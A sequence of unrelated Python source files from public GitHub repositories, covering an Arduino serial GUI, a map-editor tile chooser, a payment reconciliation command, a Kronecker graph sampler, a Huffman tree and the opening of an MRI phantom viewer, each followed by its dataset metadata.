tk.Tk()\nwindow.geometry(\"250x400\")\nwindow.configure(background='black')\nwindow.resizable(False, False)\nwindow.title(\"Skrew It Up\")\n\ntitle_logo = make_circle(\"img.png\", 32)\nwindow.iconphoto(True, title_logo)\n\ndef on_button_click():\n    global arduino \n    selected = selected_port.get()\n    print(\"Selected Port:\", selected)\n    arduino = serial.Serial(selected, 9600) \n    port_dropdown.grid_forget()\n    submit_button.grid_forget()\n    window.geometry(\"250x350\")\n    read_from_arduino() \n\nbutton1_image = make_circle(\"img.png\", 100)\nbutton1 = tk.Button(window, image=button1_image, relief=tk.SOLID, bd=0, command=lambda: None)\nbutton1.grid(row=0, column=0, padx=10, pady=5)\nbutton1_text = tk.Label(window, text=\"Button 1\", fg=\"white\", bg=\"black\", font=(\"Roboto\", 16))\nbutton1_text.grid(row=0, column=1)\nturn_off_button(button1) # Set default state to off\n\nbutton2_image = make_circle(\"img.png\", 100)\nbutton2 = tk.Button(window, image=button2_image, relief=tk.SOLID, bd=0, command=lambda: None)\nbutton2.grid(row=1, column=0, padx=10, pady=5)\nbutton2_text = tk.Label(window, text=\"Button 2\", fg=\"white\", bg=\"black\", font=(\"Roboto\", 16))\nbutton2_text.grid(row=1, column=1)\nturn_off_button(button2) # Set default state to off\n\nbutton3_image = make_circle(\"img.png\", 100)\nbutton3 = tk.Button(window, image=button3_image, relief=tk.SOLID, bd=0, command=lambda: None)\nbutton3.grid(row=2, column=0, padx=10, pady=5)\nbutton3_text = tk.Label(window, text=\"Button 3\", fg=\"white\", bg=\"black\", font=(\"Roboto\", 16))\nbutton3_text.grid(row=2, column=1)\nturn_off_button(button3) # Set default state to off\n\nserial_ports = get_serial_ports()\nselected_port = tk.StringVar()\nselected_port.set(serial_ports[0])\n\nport_dropdown = tk.OptionMenu(window, selected_port, *serial_ports)\nport_dropdown.grid(row=3, column=0, padx=10, pady=10)\n\nsubmit_button = tk.Button(window, text=\"Submit\", command=on_button_click)\nsubmit_button.grid(row=3, column=1, pady=10)\n\ndef read_from_arduino():\n    try:\n        data = arduino.readline().strip().decode('utf-8', errors='ignore')\n    except UnicodeDecodeError:\n        print(\"Error decoding data from Arduino\")\n        data = ''\n    \n    if data == '1':\n        light_up_button(button1)\n    elif data == '2':\n        light_up_button(button2)\n    elif data == '3':\n        light_up_button(button3)\n    else:\n        turn_off_button(button1)\n        turn_off_button(button2)\n        turn_off_button(button3)\n    \n    window.after(1, read_from_arduino) 
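\n\n# ---- added sketch, not in the original script ----\n# read_from_arduino() above calls readline() on a port opened without a timeout,\n# so it blocks until a full line arrives and can freeze the Tk event loop. This\n# variant polls pyserial's in_waiting attribute and only reads once bytes are\n# buffered; to try it, schedule it from on_button_click instead of read_from_arduino.\ndef read_from_arduino_nonblocking():\n    if arduino.in_waiting:  # bytes already buffered, so readline() returns quickly\n        data = arduino.readline().strip().decode('utf-8', errors='ignore')\n        if data == '1':\n            light_up_button(button1)\n        elif data == '2':\n            light_up_button(button2)\n        elif data == '3':\n            light_up_button(button3)\n    window.after(50, read_from_arduino_nonblocking)  # 50 ms keeps the UI responsive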
\n\nwindow.mainloop()\n","repo_name":"skrewitup/Project-2-Voltage-Divider","sub_path":"GUI/final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43567419444","text":"from PyQt4 import QtCore, QtGui\nfrom xVClient import Sprite, MapRender\nfrom xVLib import Maps\n\nclass TileChooserModel(object):\n \"\"\"\n Model class for a set of tiles in the map editor.\n \n The backend model of a set of tile-like entities in the map editor\n (ie. tiles, items, etc.). Keeps track of which is selected.\n\n Even though the editor uses Qt 4 as the GUI, we're not actually\n bothering with a QtAbstractItemModel implementation here; it's\n way overcomplicated for our purposes, and since we're going ahead\n with writing our own View class anyway, it doesn't make sense.\n \"\"\"\n\n def __init__(self, spriteset=None):\n # Typecheck\n if spriteset != None and not isinstance(spriteset,Sprite.SpriteSet):\n raise TypeError(\"spriteset must be of type Sprite.SpriteSet\")\n\n # Declare the attributes\n self.spriteset = spriteset\n \"\"\"Handle to the tileset to be displayed.\"\"\"\n\n self.selected = 0\n \"\"\"The tile ID that is currently selected.\"\"\"\n\n def SelectTile(self, id):\n \"\"\"\n Selects a tile from the chooser.\n \"\"\"\n # Check if the index is valid\n if id < 0 or id >= len(self.spriteset):\n # Invalid index\n raise IndexError(\"Tile index is out of range\")\n\n # Select the tile\n self.selected = id\n\n def DeselectTile(self):\n \"\"\"\n\t Deselects the selected tile.\n\t \"\"\"\n self.selected = -1\n\n def __len__(self):\n \"\"\"\n Returns the number of tiles in this chooser.\n \"\"\"\n return len(self.spriteset)\n\n\nclass TileChooserView(QtGui.QWidget):\n \"\"\"\n View class for a tile chooser on the left side of the editor.\n \"\"\"\n\n def __init__(self, parent=None, model=None):\n \"\"\"\n Creates a new TileChooserView.\n\n This initializer will optionally accept a handle to a connected\n TileChooserModel object. 
This can be specified later or switched\n out if the TileChooserModel is not ready at the time of creation.\n And of course, you can pass a QWidget object as a parent object,\n which can be changed later using the standard PyQt4 methods.\n \"\"\"\n # typecheck the model parameter\n if model != None and not isinstance(model, TileChooserModel):\n # invalid object passed as model\n raise TypeError(\"model must be of type TileChooserModel\")\n\n # call the QWidget initializer\n super(TileChooserView, self).__init__(parent)\n\n\n # set up our default resize policies\n resize = QtGui.QSizePolicy()\n resize.setHorizontalPolicy(QtGui.QSizePolicy.Fixed)\n resize.setVerticalPolicy(QtGui.QSizePolicy.Minimum)\n self.setSizePolicy(resize)\n\n # initialize our attributes\n self.model = model\n \"\"\"Handle to the TileChooserModel object this is connected to.\"\"\"\n\n self.ChooserWidth = 5\n \"\"\"Number of tiles across in the chooser.\"\"\"\n\n self.SelectorWidth = 3\n \"\"\"Width, in pixels, of the lines that surround the selection.\"\"\"\n\n # create the pen we use for bordering the selection\n self.selectorPen = QtGui.QPen(QtCore.Qt.white)\n self.selectorPen.setWidth(self.SelectorWidth)\n\n def _GetTileID(self, x, y):\n \"\"\"\n Finds the ID number of a tile given its top-left coordinates.\n \"\"\"\n column = x // Maps.TileWidth\n row = y // Maps.TileHeight\n id = (row * self.ChooserWidth) + column\n return id\n\n def _GetTLFromID(self, id):\n \"\"\"\n Determines the top-left coordinates of a tile given its ID.\n\n This is essentially the inverse operation of _GetTileID(x,y)\n such that _GetTLFromID(_GetTileID(x,y)) = (x,y).\n \"\"\"\n # check if id is valid\n if id >= len(self.model.spriteset):\n raise KeyError(\"tile ID is out of bounds\")\n\n # calculate\n row = id // self.ChooserWidth\n col = id % self.ChooserWidth\n tlx = Maps.TileWidth * col\n tly = Maps.TileHeight * row\n return tlx,tly\n\n def paintEvent(self, event):\n \"\"\"\n Called when the view widget is drawn to a surface.\n\n This is an overloaded method from the QWidget class. 
It\n is called by the Qt 4 event manager whenever we need to\n draw the widget to something.\n \"\"\"\n # Typecheck, make sure that event is actually a QPaintEvent\n if not isinstance(event, QtGui.QPaintEvent):\n raise TypeError(\"event must be of type QPaintEvent\")\n\n # Set up our drawing system\n r = event.rect()\n painter = QtGui.QPainter()\n whiteBrush = QtGui.QBrush(QtCore.Qt.white)\n painter.begin(self)\n painter.setClipRect(r)\n \n # Clear the rect so we get a clean paint\n painter.setBrush(whiteBrush)\n painter.setPen(QtCore.Qt.NoPen)\n painter.drawRect(r)\n\n # Figure out which tiles must be redrawn\n rect_tlx,rect_tly,w,h = r.getRect()\n tlx, tly = MapRender.GetTileTL(rect_tlx,rect_tly)\n trx, tRy = MapRender.GetTileTR(rect_tlx + w - 1, rect_tly)\n brx, bry = MapRender.GetTileBR(rect_tlx + w - 1, rect_tly + h - 1)\n tiles_wide = (trx - tlx) // Maps.TileWidth + 1\n tiles_high = (bry - tly) // Maps.TileHeight + 1\n \n # Draw the tiles (oh yay, a nested loop)\n must_draw_selection = False\n for tile_across in range(tiles_wide):\n for tile_down in range(tiles_high):\n # figure out what's going on\n tile_x = tlx + (tile_across * Maps.TileWidth)\n tile_y = tly + (tile_down * Maps.TileHeight)\n tile_id = self._GetTileID(tile_x, tile_y)\n\n # check if that tile exists\n if tile_id >= len(self.model.spriteset):\n # doesn't exist\n continue\n\n # draw the tile\n tile = self.model.spriteset[tile_id]\n painter.drawPixmap(tile_x,tile_y,tile.img)\n\n # check if we will need to draw the selection border\n if tile_id == self.model.selected:\n must_draw_selection = True\n\n # do we need to draw the selection border?\n if must_draw_selection:\n # get selection information\n tile_id = self.model.selected\n tile_x, tile_y = self._GetTLFromID(tile_id)\n\n # draw the selection border\n painter.save()\n painter.setPen(self.selectorPen)\n painter.setBrush(QtCore.Qt.NoBrush)\n target = QtCore.QRect()\n target.setX(tile_x)\n target.setY(tile_y)\n target.setWidth(Maps.TileWidth)\n target.setHeight(Maps.TileHeight)\n painter.drawRect(target)\n painter.restore()\n\n # Clean up\n painter.end()\n\n def sizeHint(self):\n \"\"\"\n Calculates the size of the full view widget.\n\n This value is used by Qt 4 to manage the widget when it\n is added to its parent scrollbox.\n \"\"\"\n width = Maps.TileWidth * self.ChooserWidth\n height = Maps.TileHeight * (len(self.model) // self.ChooserWidth + 1)\n return QtCore.QSize(width,height)\n\n def mousePressEvent(self, event):\n \"\"\"\n Called when the mouse button is released after something is clicked.\n\n We overload this method from Qt 4 in order to allow the user to\n select a tile by clicking on it.\n \"\"\"\n # typecheck!\n if not isinstance(event, QtGui.QMouseEvent):\n raise TypeError(\"event must be of type QtGui.QMouseEvent\")\n\n # deselect whatever is currently selected\n prev_id = self.model.selected\n if prev_id != -1:\n # something was selected, clear the selection\n self.model.DeselectTile()\n prev_tlx, prev_tly = self._GetTLFromID(prev_id)\n prev_target = QtCore.QRect()\n prev_target.setX(prev_tlx - self.SelectorWidth)\n prev_target.setY(prev_tly - self.SelectorWidth)\n prev_target.setWidth(Maps.TileWidth * 3)\n prev_target.setHeight(Maps.TileHeight * 3)\n self.repaint(prev_target)\n\n # figure out what was clicked\n clicked_x = event.x()\n clicked_y = event.y()\n tlx, tly = MapRender.GetTileTL(clicked_x, clicked_y)\n id = self._GetTileID(tlx, tly)\n if id >= len(self.model.spriteset):\n # User clicked outside of the tiles, don't select anything\n 
return\n\n # select the tile and redraw it\n self.model.SelectTile(id)\n target = QtCore.QRect()\n target.setX(tlx - self.SelectorWidth)\n target.setY(tly - self.SelectorWidth)\n target.setWidth(3 * Maps.TileWidth)\n target.setHeight(3 * Maps.TileHeight)\n self.repaint(target)\n","repo_name":"buchwj/xvector","sub_path":"mapeditor/xVMapEdit/TileChooser.py","file_name":"TileChooser.py","file_ext":"py","file_size_in_byte":8917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16625121885","text":"from dataclasses import dataclass\nimport random\n\nfrom .gene import Gene\nfrom .op_sets import OpSets, OpsetKey\n\n\n@dataclass\nclass GeneBuilderConfig:\n num_inputs: int\n num_middlenodes: int\n num_outputs: int\n opset_key: OpsetKey\n\n\nclass GeneBuilder:\n def __init__(self, config: GeneBuilderConfig) -> None:\n self.config = config\n\n def makeGene(self) -> Gene:\n num_inputs = self.config.num_inputs\n middlenodes = [\n self.makeMiddleNode(x) for x in range(self.config.num_middlenodes)]\n output_idx_range = self.config.num_inputs + self.config.num_middlenodes\n output_idxes = [\n random.randrange(output_idx_range)\n for x in range(self.config.num_outputs)]\n return Gene(\n num_inputs,\n middlenodes,\n output_idxes,\n self.config.opset_key)\n\n def makeMiddleNode(self, middleIdx: int) -> tuple[int, int, int, int]:\n maxIdx = self.config.num_inputs + middleIdx\n in1idx = random.randrange(maxIdx)\n in2idx = random.randrange(maxIdx)\n in3idx = random.randrange(maxIdx)\n ops = OpSets.OPSET_DICT[self.config.opset_key]\n op = random.randrange(len(ops))\n return (in1idx, in2idx, in3idx, op)\n","repo_name":"Shalmezad/cgp","sub_path":"cgp/gene/gene_builder.py","file_name":"gene_builder.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14179664406","text":"from django.core.management.base import BaseCommand\nfrom django.utils import timezone\nfrom mooring.models import GlobalSettings, MooringAreaGroup\nfrom ledger.payments.bpoint.models import BpointTransaction, BpointToken\nfrom ledger.payments.models import Invoice,OracleInterface,CashTransaction\nfrom ledger.order.models import Order\nfrom django.core.exceptions import ValidationError\nfrom django.conf import settings\nfrom decimal import *\nfrom mooring.emails import sendHtmlEmail\nimport json\n\nfrom datetime import timedelta, datetime\n\nclass Command(BaseCommand):\n help = 'Check BPOINT Settlement dates with oracle Invoice Settlement dates to ensure totals match.'\n\n def handle(self, *args, **options):\n bpoint_total = Decimal('0.00')\n oracle_total = Decimal('0.00')\n invoice_total = Decimal('0.00')\n yesterday = datetime.today() - timedelta(days=1)\n today = datetime.today()# - timedelta(days=41)\n tomorrow = datetime.today() + timedelta(days=1)\n\n system = settings.PS_PAYMENT_SYSTEM_ID\n system = system.replace('S','0')\n bpoint_array = {}\n invoice_array ={}\n mismatch_bpoint = []\n mismatch_invoice = []\n ba_missing = []\n ia_missing = []\n dates_to_check = [yesterday,today,tomorrow]\n\n print (system)\n try:\n for settlement_date in dates_to_check:\n print (\"Settlement Date: \"+str(settlement_date.strftime(\"%d/%m/%Y\")))\n bpoint_total = Decimal('0.00')\n oracle_total = Decimal('0.00')\n invoice_total = Decimal('0.00')\n bpoint_array = {}\n invoice_array ={}\n mismatch_bpoint = []\n mismatch_invoice = []\n ba_missing = []\n ia_missing = []\n\n\n \n print (\"Calculation 
Bpoint Transaction Total\")\n bpoint_trans = BpointTransaction.objects.filter(settlement_date=settlement_date, crn1__istartswith=system)\n for i in bpoint_trans:\n tran_total = Decimal('0.00')\n if i.action == 'payment':\n bpoint_total = bpoint_total + Decimal(i.amount)\n tran_total = Decimal(i.amount)\n if i.action == 'refund':\n bpoint_total = bpoint_total - Decimal(i.amount)\n tran_total = tran_total - Decimal(i.amount) \n bpoint_array[i.crn1] = tran_total \n\n print (bpoint_total)\n print (\"Calculation Invoice Settlemnt Oracle Totals\")\n\n invoices = Invoice.objects.filter(settlement_date=settlement_date)\n for i in invoices:\n #print (i.reference)\n invoice_total = invoice_total + Decimal(i.amount)\n #print (i.order)\n trans_order_total = Decimal('0.00')\n for ol in Order.objects.get(number=i.order_number).lines.all():\n for order_total in ol.payment_details['order']:\n oracle_total = oracle_total + Decimal(ol.payment_details['order'][order_total])\n trans_order_total = trans_order_total + Decimal(ol.payment_details['order'][order_total])\n #print (Decimal(ol.payment_details['order'][order_total]))\n #print (oracle_total)\n invoice_array[i.reference] = trans_order_total \n print (\"ORACLE TOTAL\")\n print (oracle_total)\n print (invoice_total)\n #bpoint with mismatching invoice\n for ba in bpoint_array:\n if ba in invoice_array:\n if bpoint_array[ba] != invoice_array[ba]:\n mismatch_bpoint.append('Mismatch: '+ba+'('+invoice_array[ba]+')'+'('+bpoint_array[ba]+')')\n else:\n ba_missing.append('BP No exist: '+ba+'('+str(bpoint_array[ba])+')')\n\n # invoice with mismatching bpoint\n for ia in invoice_array:\n #print (ia)\n #print (invoice_array[ia])\n if ia in bpoint_array:\n #print (bpoint_array[ia])\n if invoice_array[ia] != bpoint_array[ia]:\n mismatch_invoice.append('Mismatch: '+ia+'('+invoice_array[ia]+')'+'('+bpoint_array[ia]+')')\n else:\n ia_missing.append(ia+'('+str(invoice_array[ia])+')')\n \n if bpoint_total != oracle_total:\n print (\"Sending Report\")\n context = {\n 'error_report': \"Bpoint and Oracle Totals do not match. Bpoint Total: \"+str(bpoint_total)+\" Oracle Total: \"+str(oracle_total),\n 'mismatch_bpoint': mismatch_bpoint,\n 'mismatch_invoice' : mismatch_invoice,\n 'ba_missing': ba_missing,\n 'ia_missing': ia_missing,\n 'settlement_date': settlement_date\n\n }\n email_list = []\n for email_to in settings.NOTIFICATION_EMAIL.split(\",\"):\n email_list.append(email_to)\n sendHtmlEmail(tuple(email_list),\"[MOORING] oracle and bpoint total mistatch\",context,'mooring/email/oracle_bpoint_report.html',None,None,settings.EMAIL_FROM,'system-oim',attachments=None)\n #raise ValidationError(\"Bpoint and Oracle Totals do not match. 
Bpoint Total: \"+str(bpoint_total)+\" Oracle Total: \"+str(oracle_total))\n except Exception as e:\n print (\"Error: Sending Email Notification: \"+settings.NOTIFICATION_EMAIL)\n context = {\n 'error_report' : str(e),\n }\n email_list = []\n for email_to in settings.NOTIFICATION_EMAIL.split(\",\"):\n email_list.append(email_to)\n sendHtmlEmail(tuple(email_list),\"[MOORING] oracle and bpoint total mistatch\",context,'mooring/email/oracle_bpoint.html',None,None,settings.EMAIL_FROM,'system-oim',attachments=None)\n\n\n\n","repo_name":"dbca-wa/moorings","sub_path":"mooring/management/commands/check_oracle_bpoint_mi.py","file_name":"check_oracle_bpoint_mi.py","file_ext":"py","file_size_in_byte":6810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18013619280","text":"# https://leetcode.com/problems/binary-gap/description/\n\ndef binaryGap(self, N):\n if N == 0:\n return 0\n else:\n maxDist = 0\n record = 0\n oneBefore = False\n while N > 0:\n resi = N % 2\n if not oneBefore and resi:\n oneBefore = True\n elif oneBefore:\n record += 1\n maxDist = max(maxDist, record)\n if resi:\n record = 0\n N //= 2\n return maxDist\n\n# Faster than 93% of accepted submissions at 40ms ","repo_name":"vincentt117/coding_challenge","sub_path":"lc_binary_gap.py","file_name":"lc_binary_gap.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21492690424","text":"# !/usr/bin/python\n# tested and works as of july\nimport sys\nimport itertools\nimport numpy\n#import pylab as plt\nfrom collections import Counter\nfrom math import factorial\nfrom functools import reduce\nimport numpy\nimport math\nimport timeit\nimport networkx as nx\nfrom collections import defaultdict\n\n# sample_kronecker_fast takes as input\n# K : an n-by-n initiator matrix stored as a list-of-lists\n# P[i][j] is the i, jth element. \n# k : the Kronecker power \n# and returns a set of edges that correspond with a realization\n# of a Kronecker graph\ndef sample_kronecker_fast(K,k):\n array=[]\n # creates the first Erdos-Renyi subregion,\n # an array with k 0's\n n=len(K);\n v = [K[i][j] for j in range(n) for i in range(n)] # vectorize by cols\n edges_mult = []\n for r in regions(v,k): # for each region of the mult. table\n edges_mult.extend(grass_hop_region(r, v)) # get edges in mult. table\n edges_kron = []\n for e in edges_mult: # map edges from mult. 
table to kron\n edges_kron.append(map_mult_to_kron(e, n))\n return edges_kron;\n\n# update takes as input:\n# n: the dimension of the n x n initiator matrix\n# array: the sequence to be updated\n# and returns the next non-decreasing sequence\ndef update(n, array):\n max = math.pow(n,2)-1;\n if(len(array)==1):\n if(array[0]==max):\n array[0]=-1\n return array\n array[0]=array[0]+1\n return array\n elif(array[len(array)-1]==max):\n place=array[0:len(array)-1]\n place=update(n, place)\n last=place[len(place)-1]\n place.append(last)\n return place\n else:\n array[len(array)-1]=array[len(array)-1]+1\n return array;\n\n# regions takes as input\n# v : a vectorized initiator matrix\n# k : the Kronecker power \n# and returns a list of lists representing all ER subregions\ndef regions(v,k):\n subregions = []; \n array=[]\n for i in range(k):\n array.append(0)\n while(array[0]!=-1):\n subregions.append(list(array));\n array = update(int(math.sqrt(len(v))),array)\n return subregions;\n \n\n# grass_hop_region takes as input\n# r: the subregion to be sampled represented by an array\n# in which the numbers correspond to letters of the subregion \n# v: an n^2 x 1 inititator matrix of probability values represented as a\n# column vector\n# and returns a list of edges represented by multisets of numbers\n# corresponding to letters.\ndef grass_hop_region(r,v):\n n=count_permutations(r);\n collection = []\n # p is the common probability value of the subregion\n p=kron(r,v)\n i=-1\n # a is the geometric random variable or length of the hop\n a=numpy.random.geometric(p)\n while(i<=n-a-1):\n i=i+a\n # finds ith multiset permutation\n thearray=unrank(r,i)\n collection.append(thearray);\n # gets the next geometric random variable or hop length\n a=numpy.random.geometric(p);\n return collection;\n\n\n# kron takes as input:\n# v: an n^2 x 1 iniator matrix of probability values stored as a single\n# column-wise vector\n# r: an array with k elements specifying a cell in the k-space\n# and returns the value at the specified location\ndef kron(r,v):\n n = int(math.sqrt(len(v)));\n final = 1;\n for val in r:\n final = final * v[val]\n return final;\n \n\n# count_permutations takes as input:\n# counter1: any iterable list or multiset\n# and returns the number of permutations of the multiset\ndef count_permutations(counter1):\n counter1=Counter(counter1)\n values = counter1.values()\n return (\n factorial(sum(values))/reduce(lambda a, v: a * factorial(v), values,1)\n )\n\n# unrank takes as input:\n# C: a multiset represented by a list\n# n: the lexicographic rank or index to be found\n# and returns the nth permutation of C in lexicographic order.\n\n# Precondition: C must be in non-decreasing order\n# This function is implemented recursively, so it is not\n# appropriate for extremely long sequences\n\n# Examples:\n# unrank([0,1,1,3], 0) returns [0,1,1,3]\n# unrank([0,1,1,3], 1) returns [0,1,3,1]\n# unrank([0,1,1,3], 2) returns [0,3,1,1]\n\ndef unrank(C, n):\n counter = 0;\n # base case of recursion\n if n == 0:\n return numpy.array(C);\n \n # find the element at the start of the unranked permutation\n for i,s in enumerate(C):\n # we want to test if element s starts the\n # new permutation\n\n # checks for repeated elements to prevent overcounting\n if(i!=0 and s==C[i-1]):\n continue;\n # creates placeholder list and removes s at position i\n place = numpy.delete(C,i)\n # checks if s starts the new permutation. 
Then start\n # the recursive step to unrank the rest of the list\n if(count_permutations(place) > n-counter):\n return numpy.append(s, unrank(place, n-counter));\n # updates the counter of the total number of permutations\n counter += count_permutations(place);\n\n# map_mult_to_kron takes as input\n# e: an array (probability sequence) consisting of a permutation of letters\n# represented as numbers 0,1,2...(n^2 - 1)\n# n: the dimension of the n x n initiator matrix\n# and returns the corresponding row and column index of the probability sequence\n# in the kronecker product graph matrix\n\ndef map_mult_to_kron(e,n):\n k=len(e);\n I = multindex_to_linear(e,pow(n,2));\n return morton_decode(I,n,k); \n\n# morton_decode takes as input:\n# I: the linear index of a multiset permutation\n# n: the dimension of the n x n initiator matrix\n# k: the Kronecker power\n# and returns the row and column indices of the multiset permutation in the\n# Kronecker matrix as an array with 2 elements\ndef morton_decode(I, n, k):\n #convert I into a base n number\n num = change_base(I,n);\n row=[]\n col=[]\n for i in range(len(num)):\n if i % 2 ==0:\n row.insert(0,num[len(num)-i-1]);\n else:\n col.insert(0,num[len(num)-i-1]);\n r = multindex_to_linear(row, n);\n c = multindex_to_linear(col, n);\n return ([r,c]);\n\n# multindex_to_linear takes as input\n# multind: an array representing a multiset permutation in the\n# multiplication table\n# N: the number of values, n^2, in the n x n initiator matrix\n# and returns the linear index of the multiset permutation\n# note: this algorithm takes a base N string and converts it to base 10\ndef multindex_to_linear(multind, N):\n rank = 0;\n for i in range(len(multind)):\n #finds the lexicographic rank of the multiset by converting it from\n #base N to base 10\n rank += multind[i] * pow(N,len(multind)-i-1);\n return rank;\n\n# change_base takes as input:\n# I: the linear index of a multiset permutation\n# n: the dimension of the n x n initiator matrix\n# and returns an array with I expressed in base n\ndef change_base(I,n):\n num=[]\n while I>= n:\n num.insert(0,I%n);\n I=int(I/n);\n num.insert(0,I);\n return num;\n\n\n#monte_carlo simulation\n# test grass_hop_kron\n# After 1000000 samples (takse a few mins)\n#we'd expect about 0.001 difference based on CLT.\ndef monte_carlo(K,k,N):\n A = numpy.zeros((8,8))\n for t in range(N):\n for e in sample_kronecker_fast(K,k):\n A[e[0],e[1]] += 1\n#print(A/N - np.kron(np.kron(np.array(K),np.array(K)),np.array(K)))\n return numpy.max(abs(A/N - numpy.kron(numpy.kron(numpy.array(K),numpy.array(K)),numpy.array(K))))\n\nprint(monte_carlo([[.99,.5],[.5,.2]],3,10000))\n\n#print(sample_kronecker_fast([.4,.7,.2,.6],2))\n#nx.draw(g);\n#plt.show();\n\n\n \n\n","repo_name":"arjunramani3/generating-random-graphs","sub_path":"fast_grass_kron.py","file_name":"fast_grass_kron.py","file_ext":"py","file_size_in_byte":7744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7856485849","text":"from django.contrib import admin\nfrom .models import Ideia\n\n# Register your models here.\nclass Ideias(admin.ModelAdmin):\n list_display = ('id', 'titulo', 'descricao')\n list_display_links = ('id', 'titulo')\n search_fields = ('titulo',)\n\nadmin.site.register(Ideia, 
Ideias)","repo_name":"silvacarloss/live-hackaton-web-apps","sub_path":"ideias/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2284344437","text":"class Arbre:\n    def __init__(self, frequence, gauche, droit):\n        \"\"\" Builds a tree\n\n        frequence: int\n        gauche, droit: Arbre\n        \"\"\"\n        self.frequence = frequence\n        self.gauche = gauche\n        self.droit = droit\n\n    def affiche(self, prefixes = [' ']):\n        \"\"\" Prints the tree \"\"\"\n        print(''.join(prefixes[:-1]) + '|___' + str(self.frequence))\n        prefixes.append('|   ')\n        self.gauche.affiche(prefixes)\n        prefixes.pop()\n        prefixes.append('    ')\n        self.droit.affiche(prefixes)\n        prefixes.pop()\n\n    def node_freq(self):\n        return self.frequence\n\n    def table_de_codage(self, code='',final_coding_table=None):\n\n        if final_coding_table is None:\n            final_coding_table = {}\n        coding_table = {}\n\n        if type(self.gauche) is Feuille:\n            coding_table[self.gauche.node_symbol()] = code+'0'\n            final_coding_table.update(coding_table)\n        elif type(self.gauche) is Arbre:\n            Arbre.table_de_codage(self.gauche,code=code+'0',final_coding_table=final_coding_table)\n\n        if type(self.droit) is Feuille:\n            coding_table[self.droit.node_symbol()] = code+'1'\n            final_coding_table.update(coding_table)\n        elif type(self.droit) is Arbre:\n            Arbre.table_de_codage(self.droit, code=code + '1',final_coding_table=final_coding_table)\n\n        return final_coding_table\n\n\nclass Feuille(Arbre):\n    def __init__(self, frequence, symbole):\n        \"\"\" Builds a leaf\n\n        frequence: int\n        symbole: str\n        \"\"\"\n        Arbre.__init__(self, frequence, None, None)\n        self.symbole = symbole\n\n    def affiche(self, prefixes = [' ']):\n        \"\"\" Prints the leaf \"\"\"\n        print(\"\".join(prefixes[:-1]) + '|___' +\n              str(self.frequence) +\n              '(' + self.symbole + ')')\n\n    def node_freq(self):\n        return self.frequence\n\n    def node_symbol(self):\n        return self.symbole\n\n    def table_de_codage(self, code=''):\n\n        coding_table = {}\n\n        coding_table[self.symbole] = code\n\n        return coding_table\n\n\n\n\nif __name__ == \"__main__\":\n    A = Arbre(18,\n              Arbre(8,\n                    Arbre(3,\n                          Feuille(1, 'd'),\n                          Feuille(2, 'c')),\n                    Feuille(5, 'b')),\n              Feuille(10, 'a'))\n    A.affiche()\n","repo_name":"vdcmathieu/ue_radiofreq_huffman","sub_path":"class_arbre_feuille.py","file_name":"class_arbre_feuille.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4415203723","text":"import logging\nfrom pritunl_scripts.auth import request\nfrom pritunl_scripts.get_organization import get_organization\nfrom pritunl_scripts.get_user import get_user\n\n\ndef disable_user(organization, username):\n    user = get_user(organization, username)\n    create = request('PUT','/user/{}/{}'.format(get_organization(organization), user['id']),\n            template = {\n                'name': user['name'],\n                'email': user['email'],\n                'disabled': True,\n            })\n    if create.status_code == 200:\n        logging.info('User: {} Disabled'.format(user))\n    else:\n        return create.status_code\n","repo_name":"fmgervasoni/pritunl-api-client","sub_path":"pritunl_scripts/disable_user.py","file_name":"disable_user.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"23029543824","text":"from phantominator import shepp_logan\nimport matplotlib\nmatplotlib.use(\"Qt5Agg\")\nfrom PyQt5 import QtCore ,uic 
,QtWidgets\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QSizePolicy, QFileDialog,QGraphicsScene,QGraphicsView\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nfrom PyQt5.uic import loadUiType\nimport numpy as np\nimport json\nimport pandas as pd\nimport matplotlib.patches as patches\nfrom PIL import Image,ImageEnhance\nfrom matplotlib.widgets import RectangleSelector\nimport matplotlib.pyplot as plt\nfrom threading import Thread\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtGui import QMouseEvent\n\n\n\n\n# Main Figure Canvas class to use them in UI\nclass MyMplCanvas(FigureCanvas):\n \"\"\"Ultimately, this is a QWidget (as well as a FigureCanvasAgg, etc.).\"\"\"\n def __init__(self, parent=None, width=5, height=4, dpi=100):\n fig = Figure(figsize=(width, height), dpi=dpi)\n self.axes = fig.add_subplot(111)\n # We want the axes cleared every time plot() is called\n # self.axes.hold(False)\n self.compute_initial_figure()\n #\n FigureCanvas.__init__(self, fig)\n self.setParent(parent)\n\n FigureCanvas.setSizePolicy(self,\n QSizePolicy.Expanding,\n QSizePolicy.Expanding)\n FigureCanvas.updateGeometry(self)\n\n def compute_initial_figure(self):\n pass\n\n# A Phantom figure canvas with ploting function \nclass phantomMplCanvas(MyMplCanvas , QtWidgets.QMainWindow):\n \"\"\"Simple canvas with a sine plot.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n \n def compute_initial_figure(self ,contrastFactor=float(1), imageSizeIndex = 0 ,imageTypeIndex = 0 , clickedData = {\"clicked\":False , \"X\":0 , \"Y\":0}):\n #generate phantom of specific size\n imageSize = [16 , 32 , 64]\n phantomImg = shepp_logan(imageSize[imageSizeIndex])\n # MR phantom (returns proton density, T1, and T2 maps)\n PD, T1, T2 = 